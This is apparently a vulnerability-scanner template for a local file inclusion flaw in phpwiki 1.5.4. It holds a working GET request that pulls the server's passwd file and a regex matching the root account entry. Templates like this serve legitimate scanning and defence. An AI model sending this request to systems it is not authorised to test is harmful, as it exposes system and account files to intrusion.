id: phpwiki-lfi
info:
name: phpwiki 1.5.4 - XSS / Local File Inclusion
author: 0x_Akoko
severity: high
description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
reference:
- https://www.exploit-db.com/exploits/38027
tags: phpwiki,lfi,xss
requests:
- method: GET
path:
- "{{BaseURL}}/phpwiki/index.php/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200